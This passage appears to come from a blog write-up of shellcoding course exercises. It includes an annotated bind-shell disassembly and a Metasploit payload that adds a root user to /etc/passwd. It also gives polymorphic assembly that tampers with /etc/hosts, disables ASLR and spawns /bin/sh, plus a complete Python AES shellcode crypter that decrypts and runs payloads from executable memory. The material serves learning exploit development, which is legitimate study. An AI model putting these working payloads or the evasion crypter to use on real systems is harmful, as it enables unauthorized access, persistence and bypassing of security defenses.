00000019 51 push ecx
0000001A 50 push eax
0000001B 89E1 mov ecx,esp
0000001D 6A66 push byte +0x66
0000001F 58 pop eax
00000020 CD80 int 0x80
00000022 894104 mov [ecx+0x4],eax
00000025 B304 mov bl,0x4
00000027 B066 mov al,0x66
00000029 CD80 int 0x80
0000002B 43 inc ebx
0000002C B066 mov al,0x66
0000002E CD80 int 0x80
00000030 93 xchg eax,ebx
00000031 59 pop ecx
00000032 6A3F push byte +0x3f
00000034 58 pop eax
00000035 CD80 int 0x80
00000037 49 dec ecx
00000038 79F8 jns 0x32
0000003A 682F2F7368 push dword 0x68732f2f
0000003F 682F62696E push dword 0x6e69622f
00000044 89E3 mov ebx,esp
00000046 50 push eax
00000047 53 push ebx
00000048 89E1 mov ecx,esp
0000004A B00B mov al,0xb
0000004C CD80 int 0x80
Coming in at 78 bytes, this one has mine beat by.. oh, 30 bytes or so? RIP me.
Starting from the top, we find that the initial call for socketcall()
, calling socket()
, is identical to the reverse shell we just looked at.
00000000 31DB xor ebx,ebx
00000002 F7E3 mul ebx
00000004 53 push ebx
00000005 43 inc ebx
00000006 53 push ebx
00000007 6A02 push byte +0x2
00000009 89E1 mov ecx,esp
0000000B B066 mov al,0x66
0000000D CD80 int 0x80
Moving on, we see our bind()
code:
0000000F 5B pop ebx ; pop 0x02 into ebx for bind()
00000010 5E pop esi ; pop 0x01 into esi for later
00000011 52 push edx ; start our sockaddr struct by pushing NULL onto the stack
00000012 680200115C push dword 0x5c110002 ; push our port (5c11 = 4444) and AF_INET (0x02) onto the stack
00000017 6A10 push byte +0x10 ; push the size of the sockaddr struct
00000019 51 push ecx ; push the sockaddr struct address (clever stack manipulations, initially set in connect!)
0000001A 50 push eax ; push the socket file descriptor returned from socket()
0000001B 89E1 mov ecx,esp ; move the address of arguments into ecx
0000001D 6A66 push byte +0x66 ;
0000001F 58 pop eax ; push / pop is less bytes than mov
00000020 CD80 int 0x80 ; call bind()
This one struck me, the instructions at 0x00000019 blew my mind at first, but after stepping through it made total sense. This instruction is intended to put the pointer of the address of sockaddr onto the stack– now looking at it, it’s just pushing ecx on… Well as it turns out, ecx actuall still points to the correct address from when it was set in socket()
initially! Some clever stack play lets us simply reuse the register without modification. That’s pretty slick!
Next, we go to listen()
, 0x04:
00000022 894104 mov [ecx+0x4],eax ; ecx is esp, add a null to esp + 4
00000025 B304 mov bl,0x4 ; move 0x4 (listen) into bl
00000027 B066 mov al,0x66 ; move socketcall into eax
00000029 CD80 int 0x80 ; call socketcall()
For the listen()
function, a small stack manipulation is made in 0x00000022, simply to pass a null byte in as the ‘backlog’ parameter. ESP already points to the socket file descriptor, so we’re good to go, otherwise!
Next up, a simple accept()
call:
0000002B 43 inc ebx ; increase ebx to 0x5 (accept)
0000002C B066 mov al,0x66 ;
0000002E CD80 int 0x80 ; call socketcall!
After calling accept, we move to the last two functions, our dup2 loop, which is the same, highly optimized code we saw in the reverse shell and lastly, calling the shell itself, which is also the same code from the reverse shell.
00000030 93 xchg eax,ebx ; save the file descriptor from accept()
00000031 59 pop ecx ; pop the initial FD from socket (pushed to the stack @ 0000001A)
00000032 6A3F push byte +0x3f ; start the dup2 loop
00000034 58 pop eax
00000035 CD80 int 0x80
00000037 49 dec ecx
00000038 79F8 jns 0x32 ; dup2 loop ends
0000003A 682F2F7368 push dword 0x68732f2f ; execve starts
0000003F 682F62696E push dword 0x6e69622f
00000044 89E3 mov ebx,esp
00000046 50 push eax
00000047 53 push ebx
00000048 89E1 mov ecx,esp
0000004A B00B mov al,0xb
0000004C CD80 int 0x80 ; call execve!
Looking at the bind and the reverse shells, after a bit of getting this under my belt, it makes sense that there would be so much code reuse. The shellcodes once seemed so mysterious, but now I can see their immense similarities.
adduser
Rather than walk through some semi-similar staged shells, I wanted to take a quick glance at how msf handles adding a user via shellcode.
$ msfvenom -p linux/x86/adduser -f raw | ndisasm -u -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes
00000000 31C9 xor ecx,ecx
00000002 89CB mov ebx,ecx
00000004 6A46 push byte +0x46
00000006 58 pop eax
00000007 CD80 int 0x80
00000009 6A05 push byte +0x5
0000000B 58 pop eax
0000000C 31C9 xor ecx,ecx
0000000E 51 push ecx
0000000F 6873737764 push dword 0x64777373
00000014 682F2F7061 push dword 0x61702f2f
00000019 682F657463 push dword 0x6374652f
0000001E 89E3 mov ebx,esp
00000020 41 inc ecx
00000021 B504 mov ch,0x4
00000023 CD80 int 0x80
00000025 93 xchg eax,ebx
00000026 E828000000 call 0x53
0000002B 6D insd
0000002C 657461 gs jz 0x90
0000002F 7370 jnc 0xa1
00000031 6C insb
00000032 6F outsd
00000033 69743A417A2F6449 imul esi,[edx+edi+0x41],dword 0x49642f7a
0000003B 736A jnc 0xa7
0000003D 3470 xor al,0x70
0000003F 3449 xor al,0x49
00000041 52 push edx
00000042 633A arpl [edx],di
00000044 303A xor [edx],bh
00000046 303A xor [edx],bh
00000048 3A2F cmp ch,[edi]
0000004A 3A2F cmp ch,[edi]
0000004C 62696E bound ebp,[ecx+0x6e]
0000004F 2F das
00000050 7368 jnc 0xba
00000052 0A598B or bl,[ecx-0x75]
00000055 51 push ecx
00000056 FC cld
00000057 6A04 push byte +0x4
00000059 58 pop eax
0000005A CD80 int 0x80
0000005C 6A01 push byte +0x1
0000005E 58 pop eax
0000005F CD80 int 0x80
Following a similar protocol to previous, we’ll break each section down by syscall.
The first syscall is for setgid()
(0x46)
00000000 31C9 xor ecx,ecx ; zero out ecx
00000002 89CB mov ebx,ecx ; zero out ebx
00000004 6A46 push byte +0x46 ; push 0x46 onto the stack
00000006 58 pop eax ; pop it into eax
00000007 CD80 int 0x80 ; call setgid
After setgid, we see the following:
00000009 6A05 push byte +0x5 ; push 0x5 onto the stack
0000000B 58 pop eax ; pop that value into eax for open() syscall
0000000C 31C9 xor ecx,ecx ; zero out ecx
0000000E 51 push ecx ; push a zero onto the stack
0000000F 6873737764 push dword 0x64777373 ;
00000014 682F2F7061 push dword 0x61702f2f ;
00000019 682F657463 push dword 0x6374652f ; push /etc//passwd onto the stack
0000001E 89E3 mov ebx,esp ; move the pointer to /etc//passwd into ebx
00000020 41 inc ecx ; increase ecx to 0x1
00000021 B504 mov ch,0x4 ; move 0x4 into the upper bit of the lowest ECX register, creating 0x401 (write and O_NOCTTY flag)
00000023 CD80 int 0x80 ; call open()
Next, if you look at the shellcode and think wtf, you’re not wrong. After a quick xchg and a call, this section is a jumble as it’s actually ascii we’re looking at, not legitimate instructions.
00000025 93 xchg eax,ebx ; xchg the file descriptor that open() returned
00000026 E828000000 call 0x53 ; call 0x53, and skip all the junk
So, we xchg the file descriptor and call the next part of the legit payload, starting at offset 53. Our shellcode looks a little jumbled though, and we can’t get an accurate disassembly moving forward without going at it by hand. But, ndisasm has a -k option which allows us to disassemble from an offset. We can use that here:
$ msfvenom -p linux/x86/adduser -f raw | ndisasm -u -k 43,40 -
/var/lib/gems/2.5.0/gems/bundler-1.17.3/lib/bundler/rubygems_integration.rb:200: warning: constant Gem::ConfigMap is deprecated
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 97 bytes
00000000 31C9 xor ecx,ecx
00000002 89CB mov ebx,ecx
00000004 6A46 push byte +0x46
00000006 58 pop eax
00000007 CD80 int 0x80
00000009 6A05 push byte +0x5
0000000B 58 pop eax
0000000C 31C9 xor ecx,ecx
0000000E 51 push ecx
0000000F 6873737764 push dword 0x64777373
00000014 682F2F7061 push dword 0x61702f2f
00000019 682F657463 push dword 0x6374652f
0000001E 89E3 mov ebx,esp
00000020 41 inc ecx
00000021 B504 mov ch,0x4
00000023 CD80 int 0x80
00000025 93 xchg eax,ebx
00000026 E828000000 call 0x53
0000002B skipping 0x28 bytes
00000053 59 pop ecx
00000054 8B51FC mov edx,[ecx-0x4]
00000057 6A04 push byte +0x4
00000059 58 pop eax
0000005A CD80 int 0x80
0000005C 6A01 push byte +0x1
0000005E 58 pop eax
0000005F CD80 int 0x80
That’s much cleaner! Starting from 0x00000053, the syscall for write, with the associated arguments (count, pointer to characters and the file descriptor from open()
)
00000053 59 pop ecx ; pop the location of the string into ecx (call leaves it on the stack!)
00000054 8B51FC mov edx,[ecx-0x4] ; store the string's length into edx
00000057 6A04 push byte +0x4 ;
00000059 58 pop eax ; pop 0x4 (write) into eax
0000005A CD80 int 0x80 ; call write()
Lastly, we call sys_exit with a push, pop.
0000005C 6A01 push byte +0x1
0000005E 58 pop eax
0000005F CD80 int 0x80
Task 6: Polymorphic
The first shellcode I chose for this assignment was a shellcode which adds a value to an /etc/hosts file (found here http://shell-storm.org/shellcode/files/shellcode-893.php). I like the idea here, as it’s a little out of the normal shellcode tactic. It’s not ‘covert’ but it certainly isn’t spawning /bin/bash :shrug The original shellcode is 77 bytes, so it’s not huge, specially considering the size is going to be based on the value you add to the hosts file.
After modification, the shellcode now sits at 80 bytes. Three bytes were added to the assembly, but the meat of the shellcode has been rewritten with equivalent instructions– I was even able to add some kewl math. Here it is:
global _start
section .text
_start:
xor ecx, ecx
mul ecx
push eax
mov al, 0x4 ; Mod
push 0x7374736f ;/etc///hosts
push 0x682f2f2f
push 0x6374652f
mov ebx, esp
inc ecx ; Mod
push ecx ; Mod
pop edi ; Mod
mov ch, al ; Mod
inc eax ; Mod
int 0x80 ;syscall to open file
mov ebx, eax ; Mod
push 0x4
pop eax
jmp short _load_data ;jmp-call-pop technique to load the map
_write:
pop ecx
mov dl, len ; Mod
int 0x80 ;syscall to write in the file
sub edx, 0xE ; Mod (this needs to be changed based on the length of 'google' as it's subtracting to 6. Perhaps use a div and do the modulus?)
mov eax, edx ; Mod
int 0x80 ;syscall to close the file
mov eax, edi ; Mod
int 0x80 ;syscall to exit
_load_data:
call _write
google db "127.1.1.1 google.com"
len: equ $-google ; Mod
http://shell-storm.org/shellcode/files/shellcode-813.php
My second choice for shellcodes was one intended to disable ASLR by rewriting the contents of /proc/sys/kernel/randomize_va_space. Again, this piqued my interest due to it not being quite as ‘common’. The original shellcode came in at 83 bytes, mine’s a bit bulkier coming in at 91 bytes, but it’s core is completely different. It may not be the most efficient, but I thought the changes were pretty clever, every section except exit() has been pretty heavily modified.
global _start
section .text
_start:
xor eax,eax
push eax
push 0x65636170
push 0x735f6176
push 0x5f657a69
push 0x6d6f646e
push 0x61722f6c
push 0x656e7265
push 0x6b2f7379
push 0x732f636f
push 0x72702f2f
mov ebx,esp
mov eax, 0x2
mov ch, al
mov cl, 0xbc
imul eax, 0x4
int 0x80
mov ebx,eax
push eax
push 0x30
pop edx
mov dh, 0x3a
push dx
mov ecx,esp
xor edx,edx
mov dl, 0x2
mov al, 0x2
mul dl
dec edx
int 0x80
add al, 0x5
int 0x80
inc eax
int 0x80
For an 8 byte increase, I’d say that’s a pretty nice change.
http://shell-storm.org/shellcode/files/shellcode-811.php
Lastly, I decided to try my hand at taking an optimized shellcode and seeing if I could modify it enough for me to feel as though I actually DID something to it, without inflating it’s size too much. I was pleasantly surprised that my modifications actually kept it the same size, 28 bytes, but I changed the majority of what was actually able to be modified– in reality there’s not much you can really do with the ‘//bin/sh’.
$ cat execve-poly.nasm
global _start
section .text
_start:
xor eax, eax
xor ecx, ecx
xor edx, edx
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push 0xb
pop eax
int 0x80
xchg edx, eax
inc eax
int 0x80
I’ve had a lot of fun with these tasks, but so far task four and six have been the most fun. These two have required creativity, which is something that really allows us to flex our capabilities and learn new techniques. I was pretty proud of the little byte manipulations I managed to plug in here and there. Perhaps simplistic, but isn’t that the name of the game?
Task 7: Shellcode Crypter
Task 7 was… interesting. By far the most time spent headbanging (to metal and against metal), while also sporting the biggest facepalm.
My original plan did end up being the outcome, although it took a detour and ended up at the same result. For this task I decided to go the AES CBC route– it’s a common and easily implemented encryption scheme. Using this article, https://www.novixys.com/blog/using-aes-encryption-decryption-python-pycrypto/ , I was able to come up with a PoC encryption / decryption scheme pretty quickly. I even fixed the padding issue before it even became a problem. I suppose ‘fixed’ should say ‘anticipated’, which is cool. The encryption and decryption took very little time, but the script itself was pretty lame– the shellcode was hardcoded within it, it didn’t spit things out in cool formats and there was a single argument, just for the key.
Not liking boring things, I spent the next while (read: loooong time) fighting with the way python3 handles \x90 hex notation from the CLI. Storing a \x notated hex byte as a well, byte, that’s stored in a variable with the type() of ‘string’ is a lot harder than I anticipated. I got it figured out with some help eventually, but alas the problems continued. Once I had my fiftieth cheeky encoding fix, I felt like I was pretty much done. I found some of the common techniques for executing shellcode from python and… none of them worked. It took a while to figure out what was happening. Mostly because the scripts did, sorta nothing at all once they got to the ’executing shellcode’ part. That was a bummer.
I suspected memory protections might be at play, as my original shellcodes matched my encrypted / decrypted ones. I found a comment that alluded to modern python versions putting the values used in ctype into areas of memory that CAN’T be munprotected, so I moved back from my Kali 2020 box to an older ubuntu VM. Installed the script’s prerequisites and ran it in python 2.7.
And obviously, it worked. I was relieved but also a little frustrated. The lack of output from the script when running in kali was a little annoying– I’m not sure how to ascertain the root cause, so it’s just more to look into. Honestly, I’m still pretty stoked on the script– it’s overall utility is pretty neat and I learned a lot about the process involved, I probably learned the most about python3 encodings though :shrug
The below is written in python3 and does a lot of stuff that’s just not really necessary in py2.7. Everything works in 2.7 and everything BUT the execution works in python 3 on Kali 2020.
#!/usr/bin/env python
# AES Shellcode Encrypter / Decrypter
# PyCrypto
from Crypto.Cipher import AES
import ctypes
import mmap
import sys, os, argparse, base64
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--shellcode", help="Shellcode in \\x90 format", type=str, required=True)
parser.add_argument("-k", "--key", help="The AES key", type=str, required=True)
parser.add_argument("-d", help="Base64'd, AES CBC encrypted shellcode", action="store_true")
parser.add_argument("-e", help="Encrypt shellcode with AES CBC", action="store_true")
args = parser.parse_args()
# First check the args
if len(sys.argv) < 3:
print("[!] Not enough arguments, exiting.")
sys.exit()
# Check the shellcode length and pad it if necessary
def padShellcode(shellcode):
pl = 16 - (len(shellcode) % 16)
if (pl >= 1 or pl != 16):
print("[!] Shellcode is %s bytes, %s bytes of padding are needed for AES CBC encryption" % (len(shellcode), pl))
paddedShellcode = bytearray(b'\x90' * pl + shellcode)
else:
print("[+] Shellcode is a multiple of 16, no padding is required! Length: %s" % len(shellcode))
return paddedShellcode
def encrypt(key, data):
iv = os.urandom(16)
aes = AES.new(key, AES.MODE_CBC, iv)
return iv + aes.encrypt(bytes(data))
def decrypt(key, cipherText):
iv = cipherText[:AES.block_size]
aes = AES.new(key, AES.MODE_CBC, iv)
decoded = aes.decrypt(cipherText)
return decoded[AES.block_size:]
def normalize(s):
normalized = ""
for byte in bytearray(s):
normalized += '\\x%02x' % (byte)
return normalized
def py3ShellcodeFix(s):
# get the string and split on the \x characters
code = s.split('\\x')
# remove any blank strings that may appear (you might also be able to get away with just doing code[1:] instead)
code = list(filter(lambda x: x != '', code))
# for each base 16 "character", convert it into a list of integers, then convert all that into a bytearray
return bytearray([int(x, 16) for x in code])
# Will NOT work in python3 / newer machines
def runShellcode(shellcode):
# Allocate memory with a RWX private anonymous mmap
exec_mem = mmap.mmap(-1, len(shellcode),
prot = mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC,
flags = mmap.MAP_ANONYMOUS | mmap.MAP_PRIVATE)
# Copy shellcode from bytes object to executable memory
exec_mem.write(shellcode)
# Cast the memory to a C function object
ctypes_buffer = ctypes.c_int.from_buffer(exec_mem)
function = ctypes.CFUNCTYPE( ctypes.c_int64 )(ctypes.addressof(ctypes_buffer))
function._avoid_gc_for_mmap = exec_mem
# Return pointer to shell code function in executable memory
return function
if args.e:
shellcode = py3ShellcodeFix(args.shellcode)
paddedShellcode = padShellcode(shellcode)
#print(paddedShellcode)
encryptedShellcode = encrypt(args.key, paddedShellcode)
n = normalize(encryptedShellcode)
print("[+] Encrypted shellcode (raw):\n%s\n" % encryptedShellcode)
print("[+] Encrypted shellcode (\\x):\n%s\n" % n)
print("[+] Encrypted shellcode (base64):\n%s\n" % base64.b64encode(encryptedShellcode))
if args.d:
shellcode = py3ShellcodeFix(args.shellcode)
decrypted = decrypt(args.key, bytes(shellcode))
n = normalize(decrypted)
print("[+] Decrypted shellcode (raw):\n%s\n" % decrypted)
print("[+] Decrypted shellcode (\\x):\n%s" % n)
print("[*] Executing shellcode...")
runShellcode(decrypted)()